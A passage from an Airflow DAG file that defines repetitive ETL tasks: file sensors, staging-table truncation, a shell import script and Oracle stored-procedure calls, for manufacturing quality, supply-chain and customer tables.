ODS_UQ_QualityReturnQty_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_QualityReturnQty"
)
# JOB_TYPE=SQL
my_taskid = "UQ_QualityReturnQty"
UQ_QualityReturnQty = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_JQMList_WH"
ODS_UQ_JQMList_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_JQMList_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_JQMList_STG"
UQ_JQMList_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_JQMList"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_JQMList_LD"
ODS_UQ_JQMList_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_JQMList"
)
# JOB_TYPE=SQL
my_taskid = "UQ_JQMList"
UQ_JQMList = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_S1_WH"
ODS_UQ_IQC_DailyManpower_S1_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_S1_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_S1_STG"
UQ_IQC_DailyManpower_S1_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_S1"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_S1_LD"
ODS_UQ_IQC_DailyManpower_S1_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_S1"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_S1"
UQ_IQC_DailyManpower_S1 = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_NQJ_WH"
ODS_UQ_IQC_DailyManpower_NQJ_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_NQJ_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_NQJ_STG"
UQ_IQC_DailyManpower_NQJ_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_NQJ"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_NQJ_LD"
ODS_UQ_IQC_DailyManpower_NQJ_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_NQJ"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_NQJ"
UQ_IQC_DailyManpower_NQJ = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_NYC_WH"
ODS_UQ_IQC_DailyManpower_NYC_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_NYC_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_NYC_STG"
UQ_IQC_DailyManpower_NYC_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_NYC"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_NYC_LD"
ODS_UQ_IQC_DailyManpower_NYC_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_NYC"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_NYC"
UQ_IQC_DailyManpower_NYC = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_NQX_WH"
ODS_UQ_IQC_DailyManpower_NQX_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_NQX_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_NQX_STG"
UQ_IQC_DailyManpower_NQX_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_NQX"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_NQX_LD"
ODS_UQ_IQC_DailyManpower_NQX_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_NQX"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_NQX"
UQ_IQC_DailyManpower_NQX = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_NVN_WH"
ODS_UQ_IQC_DailyManpower_NVN_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_NVN_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_NVN_STG"
UQ_IQC_DailyManpower_NVN_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_NVN"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_NVN_LD"
ODS_UQ_IQC_DailyManpower_NVN_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_NVN"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_NVN"
UQ_IQC_DailyManpower_NVN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_IQC_DailyManpower_S2_WH"
ODS_UQ_IQC_DailyManpower_S2_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_IQC_DailyManpower_S2_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_IQC_DailyManpower_S2_STG"
UQ_IQC_DailyManpower_S2_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_IQC_DailyManpower_S2"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_IQC_DailyManpower_S2_LD"
ODS_UQ_IQC_DailyManpower_S2_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_IQC_DailyManpower_S2"
)
# JOB_TYPE=SQL
my_taskid = "UQ_IQC_DailyManpower_S2"
UQ_IQC_DailyManpower_S2 = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_InventoryOwnerList_WH"
ODS_UQ_InventoryOwnerList_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_InventoryOwnerList_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_InventoryOwnerList_STG"
UQ_InventoryOwnerList_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_InventoryOwnerList"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_InventoryOwnerList_LD"
ODS_UQ_InventoryOwnerList_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_InventoryOwnerList"
)
# JOB_TYPE=SQL
my_taskid = "UQ_InventoryOwnerList"
UQ_InventoryOwnerList = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_MoPartType_WH"
ODS_UQ_MoPartType_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_MoPartType_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_MoPartType_STG"
UQ_MoPartType_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_MoPartType"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_MoPartType_LD"
ODS_UQ_MoPartType_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_MoPartType"
)
# JOB_TYPE=SQL
my_taskid = "UQ_MoPartType"
UQ_MoPartType = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_Escape_WH"
ODS_UQ_Escape_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_Escape_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_Escape_STG"
UQ_Escape_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_Escape"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_Escape_LD"
ODS_UQ_Escape_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_Escape"
)
# JOB_TYPE=SQL
my_taskid = "UQ_Escape"
UQ_Escape = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_US_reason_code_WH"
ODS_US_reason_code_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_SCM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/SCM/US_reason_code_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "US_reason_code_STG"
US_reason_code_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
sql= "TRUNCATE TABLE STAGE.US_reason_code"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_US_reason_code_LD"
ODS_US_reason_code_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_SCM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD SCM US_reason_code"
)
# JOB_TYPE=SQL
my_taskid = "US_reason_code"
US_reason_code = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_US_scrap_reason_code_WH"
ODS_US_scrap_reason_code_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_SCM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/SCM/US_scrap_reason_code_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "US_scrap_reason_code_STG"
US_scrap_reason_code_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
sql= "TRUNCATE TABLE STAGE.US_scrap_reason_code"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_US_scrap_reason_code_LD"
ODS_US_scrap_reason_code_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_SCM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD SCM US_scrap_reason_code"
)
# JOB_TYPE=SQL
my_taskid = "US_scrap_reason_code"
US_scrap_reason_code = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_US_BOM_PRODUCT_LIST_WH"
ODS_US_BOM_PRODUCT_LIST_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_SCM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/SCM/US_BOM_PRODUCT_LIST_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "US_BOM_PRODUCT_LIST_STG"
US_BOM_PRODUCT_LIST_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
sql= "TRUNCATE TABLE STAGE.US_BOM_PRODUCT_LIST"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_US_BOM_PRODUCT_LIST_LD"
ODS_US_BOM_PRODUCT_LIST_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_SCM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD SCM US_BOM_PRODUCT_LIST"
)
# JOB_TYPE=SQL
my_taskid = "US_BOM_PRODUCT_LIST"
US_BOM_PRODUCT_LIST = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_US_POTransfer_WH"
ODS_US_POTransfer_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_SCM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/SCM/US_POTransfer_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "US_POTransfer_STG"
US_POTransfer_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
sql= "TRUNCATE TABLE STAGE.US_POTransfer"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_US_POTransfer_LD"
ODS_US_POTransfer_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_SCM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD SCM US_POTransfer"
)
# JOB_TYPE=SQL
my_taskid = "US_POTransfer"
US_POTransfer = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_US_ExcessonHandTransfer_WH"
ODS_US_ExcessonHandTransfer_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_SCM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/SCM/US_ExcessonHandTransfer_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "US_ExcessonHandTransfer_STG"
US_ExcessonHandTransfer_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
sql= "TRUNCATE TABLE STAGE.US_ExcessonHandTransfer"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_US_ExcessonHandTransfer_LD"
ODS_US_ExcessonHandTransfer_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_SCM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD SCM US_ExcessonHandTransfer"
)
# JOB_TYPE=SQL
my_taskid = "US_ExcessonHandTransfer"
US_ExcessonHandTransfer = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_SCM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_FaultInjectionRecord_WH"
ODS_UQ_FaultInjectionRecord_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=W_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_FaultInjectionRecord_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_FaultInjectionRecord_STG"
UQ_FaultInjectionRecord_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_FaultInjectionRecord"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_FaultInjectionRecord_LD"
ODS_UQ_FaultInjectionRecord_LD = BashOperator(
task_id=my_taskid,
dag=W_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_FaultInjectionRecord"
)
# JOB_TYPE=SQL
my_taskid = "UQ_FaultInjectionRecord"
UQ_FaultInjectionRecord = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_QSCANTrackingRecord_WH"
ODS_UQ_QSCANTrackingRecord_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=W_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_QSCANTrackingRecord_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_QSCANTrackingRecord_STG"
UQ_QSCANTrackingRecord_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_QSCANTrackingRecord"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_QSCANTrackingRecord_LD"
ODS_UQ_QSCANTrackingRecord_LD = BashOperator(
task_id=my_taskid,
dag=W_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_QSCANTrackingRecord"
)
# JOB_TYPE=SQL
my_taskid = "UQ_QSCANTrackingRecord"
UQ_QSCANTrackingRecord = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_ModelMPInfo_WH"
ODS_UQ_ModelMPInfo_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=W_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_ModelMPInfo_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_ModelMPInfo_STG"
UQ_ModelMPInfo_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_ModelMPInfo"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_ModelMPInfo_LD"
ODS_UQ_ModelMPInfo_LD = BashOperator(
task_id=my_taskid,
dag=W_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_ModelMPInfo"
)
# JOB_TYPE=SQL
my_taskid = "UQ_ModelMPInfo"
UQ_ModelMPInfo = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=W_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Customer_Grouping_Map_WH"
ODS_UC_Customer_Grouping_Map_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Customer_Grouping_Map_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Customer_Grouping_Map_STG"
UC_Customer_Grouping_Map_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Customer_Grouping_Map"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Customer_Grouping_Map_LD"
ODS_UC_Customer_Grouping_Map_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Customer_Grouping_Map"
)
# JOB_TYPE=SQL
my_taskid = "UC_Customer_Grouping_Map"
UC_Customer_Grouping_Map = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Group_Customer_Location_WH"
ODS_UC_Group_Customer_Location_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Group_Customer_Location_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Group_Customer_Location_STG"
UC_Group_Customer_Location_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Group_Customer_Location"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Group_Customer_Location_LD"
ODS_UC_Group_Customer_Location_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Group_Customer_Location"
)
# JOB_TYPE=SQL
my_taskid = "UC_Group_Customer_Location"
UC_Group_Customer_Location = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Project_Decision_Customer_WH"
ODS_UC_Project_Decision_Customer_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Project_Decision_Customer_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Project_Decision_Customer_STG"
UC_Project_Decision_Customer_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Project_Decision_Customer"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Project_Decision_Customer_LD"
ODS_UC_Project_Decision_Customer_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Project_Decision_Customer"
)
